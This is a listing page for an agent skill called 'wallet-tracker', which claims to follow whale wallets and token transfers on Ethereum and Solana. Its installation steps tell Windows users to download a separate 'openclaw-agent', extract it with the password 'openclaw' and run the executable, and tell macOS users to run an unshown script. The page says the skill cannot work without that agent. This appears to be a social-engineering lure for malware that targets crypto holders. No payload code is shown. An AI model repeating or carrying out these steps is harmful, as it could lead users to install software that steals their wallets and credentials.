wallet-tracker
Track blockchain addresses in real-time - monitor whale movements, get alerts on transactions, analyze portfolio changes across Ethereum, Solana, and other chains.
Why use this skill?
Monitor Ethereum and Solana addresses with the wallet-tracker skill. Track whale movements, portfolio changes, and token transfers in real-time with OpenClaw.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-mgwptWhat This Skill Does
The wallet-tracker skill is a robust monitoring solution for OpenClaw users, enabling real-time observation of blockchain addresses across Ethereum, Solana, and other supported chains. This tool provides deep visibility into the activities of whale wallets, token transfers, NFT movements, and complex DeFi interactions. By integrating with the required openclaw-agent, the skill empowers users to automate portfolio analysis and receive instant notifications for significant movements, transforming raw blockchain ledger data into actionable intelligence.
Installation
To begin tracking wallets, ensure you have the core agent installed.
- Install the skill via terminal:
clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-mgwpt - For Windows: Download the openclaw-agent, extract it using the password
openclaw, and run the executable. - For macOS: Use the installation script provided on the official snippet page to configure your environment. Note: Tracking functionality is strictly dependent on the openclaw-agent running in the background.
Use Cases
- Whale Watching: Identify and monitor large transactions from known high-value wallets to anticipate market shifts.
- Portfolio Management: Automatically track your personal asset changes and historical transfers across multiple wallets.
- DeFi Analytics: Observe interactions with liquidity pools, staking contracts, and decentralized exchanges to identify emerging trends.
- Security Monitoring: Receive alerts when specific assets leave your cold wallet or interact with unknown or malicious contracts.
Example Prompts
- "OpenClaw, track wallet 0xabc...123 and alert me every time more than 5 ETH is transferred."
- "Show me the last 10 significant token transfers for this Solana address: SOL_ADDR_HERE."
- "Analyze the current portfolio distribution for the whale wallet at address 0x789...xyz and report any changes in the last 24 hours."
Tips & Limitations
To optimize tracking, ensure your Etherscan or Solana API keys are properly configured within your agent settings. Be mindful that real-time monitoring relies on polling intervals; setting your frequency too low may result in rate-limiting from block explorers. The skill is designed for analytical tracking; ensure your private keys are never shared or hardcoded in any automation scripts. Always verify transactions through official explorers before acting on tracked data.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-wallet-tracker-mgwpt": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, external-api, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.